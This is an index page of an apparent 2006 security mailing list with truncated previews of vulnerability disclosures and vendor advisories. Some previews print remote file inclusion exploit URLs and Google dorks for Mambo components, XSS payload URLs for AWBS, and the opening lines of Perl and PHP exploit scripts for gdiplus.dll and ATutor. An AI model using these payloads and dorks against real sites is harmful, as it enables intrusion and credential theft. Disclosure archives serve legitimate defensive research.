|
|
Colapse all |
Post message
ATutor <= 1.5.3.1 'links' blind SQL injection / admin credentials disclosure 2006-07-30 rgod autistici org com_moskool (admin.moskool.php) Remote File Include Vulnerabilities 2006-07-30 saudi unix hotmail com By saudi hackrz Rish : High --------------------------------------- test on tis site : www.filters.ru --------------------------------------- google : allinurl:"com_moskool" or "moskool" Exploit : http://[target]/component/option,com_moskool/Itemid,34/admin.moskool.php ?mosConfig_absol [ more ] [ reply ] Re: cpanel login problem 2006-07-31 usar_y_tirar hushmail com This was reported some months ago on the Cpanel forums: http://forums.cpanel.net/showthread.php?t=45570 and is registered at Cpanel's bugzilla as bug #3392 http://bugzilla.cpanel.net/show_bug.cgi?id=3392 (Both links require registration.) Although it seems they will fix it, it's not deemed to b [ more ] [ reply ] Re: PHP ip2long() function circumvention 2006-07-29 darylf charter net I think you should have reported this as a MiniBB vulnerability (and I'm assuming you have). I don't know if I would really classify this as an issue with the PHP function, though it may require looking into. I recently discovered similar behavior in Windows resolving applications. I can't be certa [ more ] [ reply ] UPDATE: [ GLSA 200605-08 ] PHP: Multiple vulnerabilities 2006-07-30 Sune Kloppenborg Jeppesen (jaervosz gentoo org) [ GLSA 200607-13 ] Audacious: Multiple heap and buffer overflows 2006-07-29 Matthias Geerdsen (vorlon gentoo org) Gdiplus.dll division by 0 2006-07-28 Mr Niega gmail com #!/bin/perl # 0-day crash poc gdiplus.dll by Mr.Niega # Check out hex offset 2e play with the 2byte's, #set it to 20 if you want a non crashing ico file # [Division by zero] # this POC tested with: # win XP ENG sp2 # And for SYS 49152 im that 0daysec guy ;) # #Rename Poc.ico to Poc.png and [ more ] [ reply ] [ MDKSA-2006:134 ] - Updated ruby packages fix safe-level vulnerabilities 2006-07-28 security mandriva com artlinks Mambo Component <= Remote Include Vulnerability 2006-07-29 Dr Jr7 hotmail com # artlinks Mambo Component <= Remote Include Vulnerability # Rish : High # Class : Remote # Script : artlinks # Thanx : www.lezr.com/vb & All kuwait hackers # d0rkiz : allinurl:"com_artlinks" # http://www.site.com/components/com_artlinks/artlinks.dispnew.php?mosConf ig_absolute_path= [ more ] [ reply ] [ GLSA 200607-12 ] OpenOffice.org: Multiple vulnerabilities 2006-07-28 Stefan Cornelius (dercorny gentoo org) mambatstaff Mambo Component <= Remote Include Vulnerability 2006-07-29 Dr Jr7 hotmail com # mambatstaff Mambo Component <= Remote Include Vulnerability # Rish : High # Class : Remote # Script : mambatstaff # Thanx : www.lezr.com/vb & All kuwait hackers # d0rkiz : allinurl:"com_mambatstaff" http://www.site.com/components/com_mambatstaff/mambatstaff.php?mosConfig _absolute_path [ more ] [ reply ] [KAPDA::#53] MYBB XSS and Dir Traversal in usercp.php 2006-07-29 roozbeh_afrasiabi yahoo com Vulnerable products : MYBB 1.x Vendor: http://www.mybboard.net Risk: Low Vulnerabilities: MYBB XSS and Dir Traversal in usercp.php Date : -------------------- Found : Feb 22 2006 Vendor Contacted : N/A Release Date : N/A About : -------------------- MyBB is a powerful, efficient an [ more ] [ reply ] Mambo Gallery Manager v095.r3 Remote File Inclusion Vulnerabilities 2006-07-28 A-S-T2006 hotmail com ---------------------------------------------------- Mambo Gallery Manager v095.r3 Remote File Inclusion Vulnerabilities ---------------------------------------------------- Discovered By A-S-T TEAM WE ARE CrAsH_oVeR_rIdE & BLACK-CODE & MR-HCR ----------------------------------------- [ more ] [ reply ] XSS vulnerability on AWBS 2006-07-29 newbinaryfile gmail com AWBS=Advanced Webhost Billing System Exploit; 1.)http://[site adres]/contact.php?action=submit&Name='><script>alert('XSS Vulnerability')%3B</script>&EmailAddress=1&AccountUsername=1&Message=1 2.)http://[site adres]/contact.php?action=submit&Name=1&EmailAddress=1&AccountUsername=' ><script>al [ more ] [ reply ] Re: Cisco VPN Concentrator IKE resource exhaustion DoS Advisory 2006-07-28 Eloy Paris (elparis cisco com) Hello, This is a Cisco PSIRT response to an advisory published on July 26, 2006 by an unaffiliated third party, Roy Hills, of NTA Monitor Ltd, entitled "Cisco VPN Concentrator IKE resource exhaustion DoS", and available at: http://www.nta-monitor.com/posts/2006/07/cisco-concentrator-dos.html This [ more ] [ reply ] Coppermine Photo Gallery v1.2.2b-Nuke Remote File Inclusion Vulnerabilities 2006-07-28 A-S-T2006 hotmail com ---------------------------------------------------- Coppermine Photo Gallery v1.2.2b-Nuke Remote File Inclusion Vulnerabilities ---------------------------------------------------- Discovered By A-S-T TEAM WE ARE CrAsH_oVeR_rIdE & BLACK-CODE & MR-HCR ---------------------------------- [ more ] [ reply ] PHP ip2long() function circumvention 2006-07-29 rgod autistici org --- PHP ip2long() function circumvention -------------------------------------- tested on php 5.0.2 " 4.3.3 ------------------------------------------------------------------------ -------- after some test on miniBB application (http://www.minibb.net/) I obtained that the php ip2long() fu [ more ] [ reply ] [USN-329-1] Thunderbird vulnerabilities 2006-07-28 Martin Pitt (martin pitt canonical com) =========================================================== Ubuntu Security Notice USN-329-1 July 28, 2006 mozilla-thunderbird vulnerabilities CVE-2006-3113, CVE-2006-3802, CVE-2006-3803, CVE-2006-3804, CVE-2006-3805, CVE-2006-3806, CVE-2006-3807, CVE-2006-3809, CVE-2006-3810, CVE-2006 [ more ] [ reply ] rPSA-2006-0139-1 httpd mod_ssl 2006-07-28 Justin M. Forbes (jmforbes rpath com) rPath Security Advisory: 2006-0139-1 Published: 2006-07-28 Products: rPath Linux 1 Rating: Major Exposure Level Classification: Remote System User Deterministic Unauthorized Access Updated Versions: httpd=/conary.rpath.com@rpl:devel//1/2.0.59-0.1-1 mod_ssl=/conary.rpath.com@rpl:devel//1/ [ more ] [ reply ] [ MDKSA-2006:133 ] - Updated apache packages fix mod_rewrite vulnerability 2006-07-28 security mandriva com Hustle -- Tumbleweed Email Firewall Remote Vulnerability 2006-07-25 Ryan Smith (whatstheaddress gmail com) cpanel login problem 2006-07-26 ali hackerz ir (1 replies) u can login to your account without username ! example : your user name : hackerz your password : 123456 u can login with only - pass : 123456 ++++++++++++++++++++++++++++++++++++++++++++++ [ more ] [ reply ] Lan-Aces Office Logic 2006-07-25 Mike chtechnology com Does anyone use this email client? I have to say It would be in your best intrest to turn off html messages until I speak with tech support at Lan-Aces. If they do not respond within 24 hours I will post a huge security bypass exploit that works for all html & scripting blocking mechanisim. With thi [ more ] [ reply ] |
|
Privacy Statement |
<?
echo "ATutor <= 1.5.3.1 'links' blind SQL injection / admin credentials disclosure\n";
echo "by rgod rgod (at) autistici (dot) org [email concealed]\n";
echo "site: http://retrogod.altervista.org\n";
echo "dork, version specific: \"Web site engine's code is copyright\" \"2001-2006
[ more ] [ reply ]